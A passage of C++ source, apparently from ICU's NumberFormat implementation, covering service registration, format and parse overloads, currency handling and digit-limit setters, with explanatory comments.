#if !UCONFIG_NO_SERVICE
static icu::ICULocaleService* gService = NULL;
static icu::UInitOnce gServiceInitOnce = U_INITONCE_INITIALIZER;
#endif
/**
* Release all static memory held by Number Format.
*/
U_CDECL_BEGIN
// Value destructor for NumberingSystem_cache entries.  Uses static_cast
// instead of the original C-style cast: the stored void* really is a
// NumberingSystem*, and named casts are greppable and intent-revealing.
static void U_CALLCONV
deleteNumberingSystem(void *obj) {
    delete static_cast<icu::NumberingSystem *>(obj);
}
// ucln_in cleanup hook: tear down the lazily-created locale service and the
// NumberingSystem cache so shutdown leaves no allocations behind.
static UBool U_CALLCONV numfmt_cleanup(void) {
#if !UCONFIG_NO_SERVICE
    gServiceInitOnce.reset();
    if (gService) {
        delete gService;
        gService = NULL;
    }
#endif
    gNSCacheInitOnce.reset();
    if (NumberingSystem_cache) {
        // uhash_close releases the table (and its entries via the configured
        // value deleter, if one was set at creation).
        uhash_close(NumberingSystem_cache);
        NumberingSystem_cache = NULL;
    }
    return TRUE;
}
U_CDECL_END
// *****************************************************************************
// class NumberFormat
// *****************************************************************************
U_NAMESPACE_BEGIN
UOBJECT_DEFINE_ABSTRACT_RTTI_IMPLEMENTATION(NumberFormat)
#if !UCONFIG_NO_SERVICE
// -------------------------------------
// SimpleNumberFormatFactory implementation
NumberFormatFactory::~NumberFormatFactory() {}

SimpleNumberFormatFactory::SimpleNumberFormatFactory(const Locale& locale, UBool visible)
    : _visible(visible)
{
    // Cache the locale's canonical name as the single ID this factory serves.
    LocaleUtility::initNameFromLocale(locale, _id);
}

SimpleNumberFormatFactory::~SimpleNumberFormatFactory() {}

UBool SimpleNumberFormatFactory::visible(void) const {
    return _visible;
}

// Reports exactly one supported ID (the locale name) unless an error is
// already pending, in which case no IDs are reported.
const UnicodeString *
SimpleNumberFormatFactory::getSupportedIDs(int32_t &count, UErrorCode& status) const
{
    if (U_SUCCESS(status)) {
        count = 1;
        return &_id;
    }
    count = 0;
    return NULL;
}
#endif /* #if !UCONFIG_NO_SERVICE */
// -------------------------------------
// default constructor
NumberFormat::NumberFormat()
  :   fGroupingUsed(TRUE),
      fMaxIntegerDigits(gDefaultMaxIntegerDigits),
      fMinIntegerDigits(1),
      fMaxFractionDigits(3), // invariant, >= minFractionDigits
      fMinFractionDigits(0),
      fParseIntegerOnly(FALSE),
      fLenient(FALSE),
      fCapitalizationContext(UDISPCTX_CAPITALIZATION_NONE)
{
    // Empty string: no currency code set yet.
    fCurrency[0] = 0;
}
// -------------------------------------
NumberFormat::~NumberFormat()
{
}

// SharedNumberFormat owns the wrapped NumberFormat and deletes it with the
// last reference.
SharedNumberFormat::~SharedNumberFormat() {
    delete ptr;
}
// -------------------------------------
// copy constructor
NumberFormat::NumberFormat(const NumberFormat &source)
    : Format(source)
{
    // Delegate all field copying to operator=; the Format base subobject is
    // copied twice (once above, once inside operator=), which is harmless.
    *this = source;
}
// -------------------------------------
// assignment operator
NumberFormat&
NumberFormat::operator=(const NumberFormat& rhs)
{
    // Field-by-field copy; also invoked by the copy constructor.
    if (this != &rhs)
    {
        Format::operator=(rhs);
        fGroupingUsed = rhs.fGroupingUsed;
        fMaxIntegerDigits = rhs.fMaxIntegerDigits;
        fMinIntegerDigits = rhs.fMinIntegerDigits;
        fMaxFractionDigits = rhs.fMaxFractionDigits;
        fMinFractionDigits = rhs.fMinFractionDigits;
        fParseIntegerOnly = rhs.fParseIntegerOnly;
        // Copy the 3-UChar ISO currency code and explicitly NUL-terminate.
        u_strncpy(fCurrency, rhs.fCurrency, 3);
        fCurrency[3] = 0;
        fLenient = rhs.fLenient;
        fCapitalizationContext = rhs.fCapitalizationContext;
    }
    return *this;
}
// -------------------------------------
UBool
NumberFormat::operator==(const Format& that) const
{
    // Format::operator== guarantees this cast is safe
    NumberFormat* other = (NumberFormat*)&that;
#ifdef FMT_DEBUG
    // This code makes it easy to determine why two format objects that should
    // be equal aren't: it prints the name of every field that differs.
    UBool first = TRUE;
    if (!Format::operator==(that)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("Format::!=");
    }
    if (!(fMaxIntegerDigits == other->fMaxIntegerDigits &&
          fMinIntegerDigits == other->fMinIntegerDigits)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("Integer digits !=");
    }
    if (!(fMaxFractionDigits == other->fMaxFractionDigits &&
          fMinFractionDigits == other->fMinFractionDigits)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("Fraction digits !=");
    }
    if (!(fGroupingUsed == other->fGroupingUsed)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("fGroupingUsed != ");
    }
    if (!(fParseIntegerOnly == other->fParseIntegerOnly)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("fParseIntegerOnly != ");
    }
    if (!(u_strcmp(fCurrency, other->fCurrency) == 0)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("fCurrency !=");
    }
    if (!(fLenient == other->fLenient)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("fLenient != ");
    }
    if (!(fCapitalizationContext == other->fCapitalizationContext)) {
        if (first) { printf("[ "); first = FALSE; } else { printf(", "); }
        debug("fCapitalizationContext != ");
    }
    if (!first) { printf(" ]"); }
#endif
    // Identity short-circuits; otherwise all formatting fields must match.
    return ((this == &that) ||
            ((Format::operator==(that) &&
              fMaxIntegerDigits == other->fMaxIntegerDigits &&
              fMinIntegerDigits == other->fMinIntegerDigits &&
              fMaxFractionDigits == other->fMaxFractionDigits &&
              fMinFractionDigits == other->fMinFractionDigits &&
              fGroupingUsed == other->fGroupingUsed &&
              fParseIntegerOnly == other->fParseIntegerOnly &&
              u_strcmp(fCurrency, other->fCurrency) == 0 &&
              fLenient == other->fLenient &&
              fCapitalizationContext == other->fCapitalizationContext)));
}
// -------------------------------------
// Default implementation sets unsupported error; subclasses should
// override.
// Base-class stub: concrete subclasses override this.  Reports
// U_UNSUPPORTED_ERROR unless an error is already pending.
UnicodeString&
NumberFormat::format(double /* unused number */,
                     UnicodeString& toAppendTo,
                     FieldPositionIterator* /* unused posIter */,
                     UErrorCode& status) const
{
    if (U_FAILURE(status)) {
        return toAppendTo;
    }
    status = U_UNSUPPORTED_ERROR;
    return toAppendTo;
}
// -------------------------------------
// Default implementation sets unsupported error; subclasses should
// override.
// Base-class stub: concrete subclasses override this.  Reports
// U_UNSUPPORTED_ERROR unless an error is already pending.
UnicodeString&
NumberFormat::format(int32_t /* unused number */,
                     UnicodeString& toAppendTo,
                     FieldPositionIterator* /* unused posIter */,
                     UErrorCode& status) const
{
    if (U_FAILURE(status)) {
        return toAppendTo;
    }
    status = U_UNSUPPORTED_ERROR;
    return toAppendTo;
}
// -------------------------------------
// Default implementation sets unsupported error; subclasses should
// override.
// Base-class stub: concrete subclasses override this.  Reports
// U_UNSUPPORTED_ERROR unless an error is already pending.
UnicodeString&
NumberFormat::format(int64_t /* unused number */,
                     UnicodeString& toAppendTo,
                     FieldPositionIterator* /* unused posIter */,
                     UErrorCode& status) const
{
    if (U_FAILURE(status)) {
        return toAppendTo;
    }
    status = U_UNSUPPORTED_ERROR;
    return toAppendTo;
}
// ------------------------------------------
// These overloads add a UErrorCode parameter and simply fall back to the
// non-status versions; on an incoming failure they return appendTo untouched.

// Formats a double, reporting any error through `status`.
UnicodeString&
NumberFormat::format(double number,
                     UnicodeString& appendTo,
                     FieldPosition& pos,
                     UErrorCode &status) const {
    if(U_SUCCESS(status)) {
        return format(number,appendTo,pos);
    } else {
        return appendTo;
    }
}

// Formats an int32_t, reporting any error through `status`.
UnicodeString&
NumberFormat::format(int32_t number,
                     UnicodeString& appendTo,
                     FieldPosition& pos,
                     UErrorCode &status) const {
    if(U_SUCCESS(status)) {
        return format(number,appendTo,pos);
    } else {
        return appendTo;
    }
}

// Formats an int64_t, reporting any error through `status`.
UnicodeString&
NumberFormat::format(int64_t number,
                     UnicodeString& appendTo,
                     FieldPosition& pos,
                     UErrorCode &status) const {
    if(U_SUCCESS(status)) {
        return format(number,appendTo,pos);
    } else {
        return appendTo;
    }
}
// -------------------------------------
// Decimal Number format() default implementation
// Subclasses do not normally override this function, but rather the DigitList
// formatting functions.
// The expected call chain from here is
//      this function ->
//      NumberFormat::format(Formattable  ->
//      DecimalFormat::format(DigitList
//
// Or, for subclasses of Formattable that do not know about DigitList,
//      this Function ->
//      NumberFormat::format(Formattable  ->
//      NumberFormat::format(DigitList  ->
//      XXXFormat::format(double

// Formats a decimal number given as a string (via StringPiece) by wrapping it
// in a Formattable and delegating to the Formattable overload.
UnicodeString&
NumberFormat::format(const StringPiece &decimalNum,
                     UnicodeString& toAppendTo,
                     FieldPositionIterator* fpi,
                     UErrorCode& status) const
{
    Formattable f;
    f.setDecimalNumber(decimalNum, status);
    format(f, toAppendTo, fpi, status);
    return toAppendTo;
}

/**
 * Helper that unwraps a Formattable before formatting: when the Formattable
 * holds a CurrencyAmount it exposes the contained number plus the ISO
 * currency code; otherwise the value is passed through unchanged.
 *
 * Old purpose of ArgExtractor was to avoid const. Not thread safe!
 *
 * Keeping it around as a shim.
 */
class ArgExtractor {
    const Formattable* num;   // the numeric value to format (never NULL)
    UChar save[4];            // ISO 4217 code + NUL terminator, or empty string
    UBool fWasCurrency;       // TRUE when the input was a CurrencyAmount
public:
    ArgExtractor(const NumberFormat& nf, const Formattable& obj, UErrorCode& status);
    ~ArgExtractor();

    const Formattable* number(void) const;
    const UChar *iso(void) const;
    UBool wasCurrency(void) const;
};

// Returns the unwrapped numeric value.
inline const Formattable*
ArgExtractor::number(void) const {
    return num;
}

// TRUE when the original Formattable wrapped a CurrencyAmount.
inline UBool
ArgExtractor::wasCurrency(void) const {
    return fWasCurrency;
}

// ISO currency code of the original CurrencyAmount, or "" if none.
inline const UChar *
ArgExtractor::iso(void) const {
    return save;
}

ArgExtractor::ArgExtractor(const NumberFormat& /*nf*/, const Formattable& obj, UErrorCode& /*status*/)
    : num(&obj), fWasCurrency(FALSE) {

    const UObject* o = obj.getObject(); // most commonly o==NULL
    const CurrencyAmount* amt;
    if (o != NULL && (amt = dynamic_cast<const CurrencyAmount*>(o)) != NULL) {
        // getISOCurrency() returns a pointer to internal storage, so we
        // copy it to retain it across the call to setCurrency().
        //const UChar* curr = amt->getISOCurrency();
        u_strcpy(save, amt->getISOCurrency());
        num = &amt->getNumber();
        fWasCurrency=TRUE;
    } else {
        save[0]=0;
    }
}

ArgExtractor::~ArgExtractor() {
}
// Formats a DigitList-based big decimal with a FieldPositionIterator.
// DecimalFormat overrides this and handles DigitLists natively; other
// subclasses (ChoiceFormat, RuleBasedNumberFormat) do not (yet), so this
// default implementation falls back to formatting the value as a double.
UnicodeString& NumberFormat::format(const DigitList &number,
                                    UnicodeString& appendTo,
                                    FieldPositionIterator* posIter,
                                    UErrorCode& status) const {
    if (U_FAILURE(status)) {
        return appendTo;
    }
    format(number.getDouble(), appendTo, posIter, status);
    return appendTo;
}
// Formats a DigitList-based big decimal with a single FieldPosition.
// DecimalFormat overrides this and handles DigitLists natively; other
// subclasses (ChoiceFormat, RuleBasedNumberFormat) do not (yet), so this
// default implementation falls back to formatting the value as a double.
UnicodeString&
NumberFormat::format(const DigitList &number,
                     UnicodeString& appendTo,
                     FieldPosition& pos,
                     UErrorCode &status) const {
    if (U_FAILURE(status)) {
        return appendTo;
    }
    format(number.getDouble(), appendTo, pos, status);
    return appendTo;
}
// Formats a Formattable with a FieldPosition. CurrencyAmount wrappers are
// unwrapped via ArgExtractor; a mismatched currency forces a clone of this
// format with the wrapped currency applied.
UnicodeString&
NumberFormat::format(const Formattable& obj,
                     UnicodeString& appendTo,
                     FieldPosition& pos,
                     UErrorCode& status) const
{
    if (U_FAILURE(status)) return appendTo;

    ArgExtractor arg(*this, obj, status);
    const Formattable *n = arg.number();
    const UChar *iso = arg.iso();

    if(arg.wasCurrency() && u_strcmp(iso, getCurrency())) {
        // trying to format a different currency.
        // Right now, we clone.
        LocalPointer<NumberFormat> cloneFmt((NumberFormat*)this->clone());
        cloneFmt->setCurrency(iso, status);
        // next line should NOT recurse, because n is numeric whereas obj was a wrapper around currency amount.
        return cloneFmt->format(*n, appendTo, pos, status);
    }

    if (n->isNumeric() && n->getDigitList() != NULL) {
        // Decimal Number. We will have a DigitList available if the value was
        // set to a decimal number, or if the value originated with a parse.
        //
        // The default implementation for formatting a DigitList converts it
        // to a double, and formats that, allowing formatting classes that don't
        // know about DigitList to continue to operate as they had.
        //
        // DecimalFormat overrides the DigitList formatting functions.
        format(*n->getDigitList(), appendTo, pos, status);
    } else {
        // No DigitList: dispatch on the concrete numeric type.
        switch (n->getType()) {
        case Formattable::kDouble:
            format(n->getDouble(), appendTo, pos);
            break;
        case Formattable::kLong:
            format(n->getLong(), appendTo, pos);
            break;
        case Formattable::kInt64:
            format(n->getInt64(), appendTo, pos);
            break;
        default:
            // Non-numeric Formattable: report a format error.
            status = U_INVALID_FORMAT_ERROR;
            break;
        }
    }

    return appendTo;
}

// -------------------------------------x
// Formats the number object and save the format
// result in the toAppendTo string buffer.

// Same as above, but collects field positions through a
// FieldPositionIterator instead of a single FieldPosition.
UnicodeString&
NumberFormat::format(const Formattable& obj,
                     UnicodeString& appendTo,
                     FieldPositionIterator* posIter,
                     UErrorCode& status) const
{
    if (U_FAILURE(status)) return appendTo;

    ArgExtractor arg(*this, obj, status);
    const Formattable *n = arg.number();
    const UChar *iso = arg.iso();

    if(arg.wasCurrency() && u_strcmp(iso, getCurrency())) {
        // trying to format a different currency.
        // Right now, we clone.
        LocalPointer<NumberFormat> cloneFmt((NumberFormat*)this->clone());
        cloneFmt->setCurrency(iso, status);
        // next line should NOT recurse, because n is numeric whereas obj was a wrapper around currency amount.
        return cloneFmt->format(*n, appendTo, posIter, status);
    }

    if (n->isNumeric() && n->getDigitList() != NULL) {
        // Decimal Number
        format(*n->getDigitList(), appendTo, posIter, status);
    } else {
        // No DigitList: dispatch on the concrete numeric type.
        switch (n->getType()) {
        case Formattable::kDouble:
            format(n->getDouble(), appendTo, posIter, status);
            break;
        case Formattable::kLong:
            format(n->getLong(), appendTo, posIter, status);
            break;
        case Formattable::kInt64:
            format(n->getInt64(), appendTo, posIter, status);
            break;
        default:
            // Non-numeric Formattable: report a format error.
            status = U_INVALID_FORMAT_ERROR;
            break;
        }
    }

    return appendTo;
}
// -------------------------------------
// Default 64-bit formatting: delegate to the 32-bit overload so that no new
// abstract method is introduced. Subclasses with true 64-bit support override.
UnicodeString&
NumberFormat::format(int64_t number,
                     UnicodeString& appendTo,
                     FieldPosition& pos) const
{
    return format(static_cast<int32_t>(number), appendTo, pos);
}
// -------------------------------------
// Parses the string and saves the result object as well
// as the final parsed position. Format interface adapter around parse().
void
NumberFormat::parseObject(const UnicodeString& source,
                          Formattable& result,
                          ParsePosition& parse_pos) const
{
    parse(source, result, parse_pos);
}

// -------------------------------------
// Formats a double and appends the result to the string.
// Convenience overload: field-position information is discarded.
UnicodeString&
NumberFormat::format(double number, UnicodeString& appendTo) const
{
    FieldPosition pos(0);
    return format(number, appendTo, pos);
}

// -------------------------------------
// Formats an int32_t and appends the result to the string.
// Convenience overload: field-position information is discarded.
UnicodeString&
NumberFormat::format(int32_t number, UnicodeString& appendTo) const
{
    FieldPosition pos(0);
    return format(number, appendTo, pos);
}

// -------------------------------------
// Formats an int64_t and appends the result to the string.
// Convenience overload: field-position information is discarded.
UnicodeString&
NumberFormat::format(int64_t number, UnicodeString& appendTo) const
{
    FieldPosition pos(0);
    return format(number, appendTo, pos);
}
// -------------------------------------
// Parses the text and save the result object. If the returned
// parse position is 0, that means the parsing failed, the status
// code needs to be set to failure. Ignores the returned parse
// position, otherwise.
void
NumberFormat::parse(const UnicodeString& text,
Formattable& result,
UErrorCode& status) const
{
if (U_FAILURE(status)) return;
ParsePosition parsePosition(0);
parse(text, result, parsePosition);
if (parsePosition.getIndex() == 0) {
status = U_INVALID_FORMAT_ERROR;
}
}
// Default currency parsing: parse a plain number and pair it with the
// format's effective currency. Returns NULL (and restores `pos`) on failure.
CurrencyAmount* NumberFormat::parseCurrency(const UnicodeString& text,
                                            ParsePosition& pos) const {
    // Default implementation only -- subclasses should override
    Formattable parseResult;
    int32_t start = pos.getIndex();
    parse(text, parseResult, pos);
    if (pos.getIndex() != start) {
        UChar curr[4];
        UErrorCode ec = U_ZERO_ERROR;
        getEffectiveCurrency(curr, ec);
        if (U_SUCCESS(ec)) {
            LocalPointer<CurrencyAmount> currAmt(new CurrencyAmount(parseResult, curr, ec), ec);
            if (U_FAILURE(ec)) {
                pos.setIndex(start); // indicate failure
            } else {
                return currAmt.orphan();
            }
        }
    }
    return NULL;
}

// -------------------------------------
// Sets to only parse integers.
void
NumberFormat::setParseIntegerOnly(UBool value)
{
    fParseIntegerOnly = value;
}

// -------------------------------------
// Sets whether lenient parse is enabled.
void
NumberFormat::setLenient(UBool enable)
{
    fLenient = enable;
}

// -------------------------------------
// Create a number style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createInstance(UErrorCode& status)
{
    return createInstance(Locale::getDefault(), UNUM_DECIMAL, status);
}

// -------------------------------------
// Create a number style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createInstance(const Locale& inLocale, UErrorCode& status)
{
    return createInstance(inLocale, UNUM_DECIMAL, status);
}

// -------------------------------------
// Create a currency style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createCurrencyInstance(UErrorCode& status)
{
    return createCurrencyInstance(Locale::getDefault(), status);
}

// -------------------------------------
// Create a currency style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createCurrencyInstance(const Locale& inLocale, UErrorCode& status)
{
    return createInstance(inLocale, UNUM_CURRENCY, status);
}

// -------------------------------------
// Create a percent style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createPercentInstance(UErrorCode& status)
{
    return createInstance(Locale::getDefault(), UNUM_PERCENT, status);
}

// -------------------------------------
// Create a percent style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createPercentInstance(const Locale& inLocale, UErrorCode& status)
{
    return createInstance(inLocale, UNUM_PERCENT, status);
}

// -------------------------------------
// Create a scientific style NumberFormat instance with the default locale.
NumberFormat* U_EXPORT2
NumberFormat::createScientificInstance(UErrorCode& status)
{
    return createInstance(Locale::getDefault(), UNUM_SCIENTIFIC, status);
}

// -------------------------------------
// Create a scientific style NumberFormat instance with the inLocale locale.
NumberFormat* U_EXPORT2
NumberFormat::createScientificInstance(const Locale& inLocale, UErrorCode& status)
{
    return createInstance(inLocale, UNUM_SCIENTIFIC, status);
}

// -------------------------------------
// All locales for which ICU locale data is available.
const Locale* U_EXPORT2
NumberFormat::getAvailableLocales(int32_t& count)
{
    return Locale::getAvailableLocales(count);
}
// ------------------------------------------
//
// Registration
//
//-------------------------------------------

#if !UCONFIG_NO_SERVICE

// -------------------------------------
// Built-in service factory that creates NumberFormat instances from ICU
// resource bundle data; `kind` carries the requested UNumberFormatStyle.
class ICUNumberFormatFactory : public ICUResourceBundleFactory {
public:
    virtual ~ICUNumberFormatFactory();
protected:
    virtual UObject* handleCreate(const Locale& loc, int32_t kind, const ICUService* /* service */, UErrorCode& status) const {
        return NumberFormat::makeInstance(loc, (UNumberFormatStyle)kind, status);
    }
};

ICUNumberFormatFactory::~ICUNumberFormatFactory() {}

// -------------------------------------
// Adapter wrapping a client-registered NumberFormatFactory in the ICU
// service framework. Adopts (and later deletes) the delegate.
class NFFactory : public LocaleKeyFactory {
private:
    NumberFormatFactory* _delegate;  // adopted client factory
    Hashtable* _ids;                 // lazily built table of supported ids

public:
    NFFactory(NumberFormatFactory* delegate)
        : LocaleKeyFactory(delegate->visible() ? VISIBLE : INVISIBLE)
        , _delegate(delegate)
        , _ids(NULL)
    {
    }

    virtual ~NFFactory();

    virtual UObject* create(const ICUServiceKey& key, const ICUService* service, UErrorCode& status) const
    {
        if (handlesKey(key, status)) {
            const LocaleKey& lkey = (const LocaleKey&)key;
            Locale loc;
            lkey.canonicalLocale(loc);
            int32_t kind = lkey.kind();

            UObject* result = _delegate->createFormat(loc, (UNumberFormatStyle)kind);
            if (result == NULL) {
                // Delegate declined; fall back to the next factory in the chain.
                result = service->getKey((ICUServiceKey&)key /* cast away const */, NULL, this, status);
            }
            return result;
        }
        return NULL;
    }

protected:
    /**
     * Return the set of ids that this factory supports (visible or
     * otherwise). This can be called often and might need to be
     * cached if it is expensive to create.
     */
    virtual const Hashtable* getSupportedIDs(UErrorCode& status) const
    {
        if (U_SUCCESS(status)) {
            if (!_ids) {
                int32_t count = 0;
                const UnicodeString * const idlist = _delegate->getSupportedIDs(count, status);
                ((NFFactory*)this)->_ids = new Hashtable(status); /* cast away const */
                if (_ids) {
                    for (int i = 0; i < count; ++i) {
                        _ids->put(idlist[i], (void*)this, status);
                    }
                }
            }
            return _ids;
        }
        return NULL;
    }
};

NFFactory::~NFFactory()
{
    delete _delegate;
    delete _ids;
}

// Locale service holding all registered NumberFormat factories.
class ICUNumberFormatService : public ICULocaleService {
public:
    ICUNumberFormatService()
        : ICULocaleService(UNICODE_STRING_SIMPLE("Number Format"))
    {
        UErrorCode status = U_ZERO_ERROR;
        registerFactory(new ICUNumberFormatFactory(), status);
    }

    virtual ~ICUNumberFormatService();

    virtual UObject* cloneInstance(UObject* instance) const {
        return ((NumberFormat*)instance)->clone();
    }

    virtual UObject* handleDefault(const ICUServiceKey& key, UnicodeString* /* actualID */, UErrorCode& status) const {
        LocaleKey& lkey = (LocaleKey&)key;
        int32_t kind = lkey.kind();

        Locale loc;
        lkey.currentLocale(loc);
        return NumberFormat::makeInstance(loc, (UNumberFormatStyle)kind, status);
    }

    virtual UBool isDefault() const {
        // Only the built-in resource-bundle factory is registered.
        return countFactories() == 1;
    }
};

ICUNumberFormatService::~ICUNumberFormatService() {}

// -------------------------------------
// One-time initializer for the lazily created singleton service.
static void U_CALLCONV initNumberFormatService() {
    U_ASSERT(gService == NULL);
    ucln_i18n_registerCleanup(UCLN_I18N_NUMFMT, numfmt_cleanup);
    gService = new ICUNumberFormatService();
}

// Returns the singleton service, creating it on first use (thread-safe
// via umtx_initOnce).
static ICULocaleService*
getNumberFormatService(void)
{
    umtx_initOnce(gServiceInitOnce, &initNumberFormatService);
    return gService;
}

// TRUE only if the service has already been created; avoids forcing
// creation just to ask the question.
static UBool haveService() {
    return !gServiceInitOnce.isReset() && (getNumberFormatService() != NULL);
}
// -------------------------------------
// Registers a client factory with the NumberFormat service. Adopts
// `toAdopt`: the factory is owned by the service on success and deleted
// here on every failure path (the original leaked it when the service
// could not be created or when called with a failure status; later ICU
// versions add the same guard).
URegistryKey U_EXPORT2
NumberFormat::registerFactory(NumberFormatFactory* toAdopt, UErrorCode& status)
{
    if (U_FAILURE(status)) {
        delete toAdopt;
        return NULL;
    }
    ICULocaleService *service = getNumberFormatService();
    if (service) {
        NFFactory *tempnnf = new NFFactory(toAdopt);
        if (tempnnf != NULL) {
            // NFFactory now owns toAdopt.
            return service->registerFactory(tempnnf, status);
        }
    }
    // Either the service or the wrapper factory could not be created.
    delete toAdopt;
    status = U_MEMORY_ALLOCATION_ERROR;
    return NULL;
}
// -------------------------------------
// Removes a previously registered factory. Fails with
// U_ILLEGAL_ARGUMENT_ERROR if the service was never created.
UBool U_EXPORT2
NumberFormat::unregister(URegistryKey key, UErrorCode& status)
{
    if (U_FAILURE(status)) {
        return FALSE;
    }
    if (haveService()) {
        return gService->unregister(key, status);
    } else {
        status = U_ILLEGAL_ARGUMENT_ERROR;
        return FALSE;
    }
}

// -------------------------------------
// Locales known to the service (including client-registered ones).
StringEnumeration* U_EXPORT2
NumberFormat::getAvailableLocales(void)
{
    ICULocaleService *service = getNumberFormatService();
    if (service) {
        return service->getAvailableLocales();
    }
    return NULL; // no way to return error condition
}
#endif /* UCONFIG_NO_SERVICE */

// -------------------------------------
// Maximum length of a locale keyword value examined below (e.g. "cf").
enum { kKeyValueLenMax = 32 };

// Resolves the "cf" (currency format) locale keyword, then creates the
// instance through the registration service when one exists, otherwise
// directly via makeInstance().
NumberFormat*
NumberFormat::internalCreateInstance(const Locale& loc, UNumberFormatStyle kind, UErrorCode& status) {
    if (kind == UNUM_CURRENCY) {
        char cfKeyValue[kKeyValueLenMax] = {0};
        UErrorCode kvStatus = U_ZERO_ERROR;
        int32_t kLen = loc.getKeywordValue("cf", cfKeyValue, kKeyValueLenMax, kvStatus);
        // "cf=account" requests accounting notation for negative amounts.
        if (U_SUCCESS(kvStatus) && kLen > 0 && uprv_strcmp(cfKeyValue,"account")==0) {
            kind = UNUM_CURRENCY_ACCOUNTING;
        }
    }
#if !UCONFIG_NO_SERVICE
    if (haveService()) {
        return (NumberFormat*)gService->get(loc, kind, status);
    }
#endif
    return makeInstance(loc, kind, status);
}

// Public factory. Plain decimal instances are cloned from a shared cache;
// every other style is created fresh.
NumberFormat* U_EXPORT2
NumberFormat::createInstance(const Locale& loc, UNumberFormatStyle kind, UErrorCode& status) {
    if (kind != UNUM_DECIMAL) {
        return internalCreateInstance(loc, kind, status);
    }
    const SharedNumberFormat *shared = createSharedInstance(loc, kind, status);
    if (U_FAILURE(status)) {
        return NULL;
    }
    NumberFormat *result = static_cast<NumberFormat *>((*shared)->clone());
    shared->removeRef();
    if (result == NULL) {
        status = U_MEMORY_ALLOCATION_ERROR;
    }
    return result;
}

// -------------------------------------
// Checks if the thousand/10 thousand grouping is used in the
// NumberFormat instance.
UBool
NumberFormat::isGroupingUsed() const
{
    return fGroupingUsed;
}

// -------------------------------------
// Sets to use the thousand/10 thousand grouping in the
// NumberFormat instance.
void
NumberFormat::setGroupingUsed(UBool newValue)
{
    fGroupingUsed = newValue;
}

// -------------------------------------
// Gets the maximum number of digits for the integral part for
// this NumberFormat instance.
int32_t NumberFormat::getMaximumIntegerDigits() const
{
    return fMaxIntegerDigits;
}

// -------------------------------------
// Sets the maximum number of digits for the integral part for
// this NumberFormat instance. The value is clamped to
// [0, gDefaultMaxIntegerDigits], and the minimum is pulled down to keep
// the min <= max invariant.
void
NumberFormat::setMaximumIntegerDigits(int32_t newValue)
{
    fMaxIntegerDigits = uprv_max(0, uprv_min(newValue, gDefaultMaxIntegerDigits));
    if(fMinIntegerDigits > fMaxIntegerDigits)
        fMinIntegerDigits = fMaxIntegerDigits;
}

// -------------------------------------
// Gets the minimum number of digits for the integral part for
// this NumberFormat instance.
int32_t
NumberFormat::getMinimumIntegerDigits() const
{
    return fMinIntegerDigits;
}

// -------------------------------------
// Sets the minimum number of digits for the integral part for
// this NumberFormat instance. The maximum is pushed up to keep the
// min <= max invariant.
void
NumberFormat::setMinimumIntegerDigits(int32_t newValue)
{
    fMinIntegerDigits = uprv_max(0, uprv_min(newValue, gDefaultMinIntegerDigits));
    if(fMinIntegerDigits > fMaxIntegerDigits)
        fMaxIntegerDigits = fMinIntegerDigits;
}

// -------------------------------------
// Gets the maximum number of digits for the fractional part for
// this NumberFormat instance.
int32_t
NumberFormat::getMaximumFractionDigits() const
{
    return fMaxFractionDigits;
}

// -------------------------------------
// Sets the maximum number of digits for the fractional part for
// this NumberFormat instance.
// NOTE(review): clamps against gDefaultMaxIntegerDigits rather than a
// fraction-specific constant, mirroring the integer-digit setter above --
// confirm the shared limit is intentional.
void
NumberFormat::setMaximumFractionDigits(int32_t newValue)
{
    fMaxFractionDigits = uprv_max(0, uprv_min(newValue, gDefaultMaxIntegerDigits));
    if(fMaxFractionDigits < fMinFractionDigits)
        fMinFractionDigits = fMaxFractionDigits;
}

// -------------------------------------
// Gets the minimum number of digits for the fractional part for
// this NumberFormat instance.
int32_t
NumberFormat::getMinimumFractionDigits() const
{
    return fMinFractionDigits;
}

// -------------------------------------
// Sets the minimum number of digits for the fractional part for
// this NumberFormat instance. The maximum is pushed up to keep the
// min <= max invariant.
// NOTE(review): clamps against gDefaultMinIntegerDigits -- see note above.
void
NumberFormat::setMinimumFractionDigits(int32_t newValue)
{
    fMinFractionDigits = uprv_max(0, uprv_min(newValue, gDefaultMinIntegerDigits));
    if (fMaxFractionDigits < fMinFractionDigits)
        fMaxFractionDigits = fMinFractionDigits;
}

// -------------------------------------
// Sets the format's currency as an ISO 4217 code (3 UChars); NULL or a
// previous empty code clears it.
void NumberFormat::setCurrency(const UChar* theCurrency, UErrorCode& ec) {
    if (U_FAILURE(ec)) {
        return;
    }
    if (theCurrency) {
        u_strncpy(fCurrency, theCurrency, 3);
        fCurrency[3] = 0;
    } else {
        fCurrency[0] = 0;
    }
}

// Returns the explicitly set ISO currency code, or "" if none was set.
const UChar* NumberFormat::getCurrency() const {
    return fCurrency;
}

// Writes the effective ISO currency code into `result` (buffer of at least
// 4 UChars): the explicitly set code if any, otherwise the default
// currency of this format's valid locale.
void NumberFormat::getEffectiveCurrency(UChar* result, UErrorCode& ec) const {
    const UChar* c = getCurrency();
    if (*c != 0) {
        u_strncpy(result, c, 3);
        result[3] = 0;
    } else {
        const char* loc = getLocaleID(ULOC_VALID_LOCALE, ec);
        if (loc == NULL) {
            loc = uloc_getDefault();
        }
        ucurr_forLocale(loc, result, 4, &ec);
    }
}

//----------------------------------------------------------------------

// Accepts only capitalization display contexts; anything else is an error.
void NumberFormat::setContext(UDisplayContext value, UErrorCode& status)
{
    if (U_FAILURE(status))
        return;
    if ( (UDisplayContextType)((uint32_t)value >> 8) == UDISPCTX_TYPE_CAPITALIZATION ) {
        fCapitalizationContext = value;
    } else {
        status = U_ILLEGAL_ARGUMENT_ERROR;
    }
}

// Returns the capitalization context; only UDISPCTX_TYPE_CAPITALIZATION
// queries are supported.
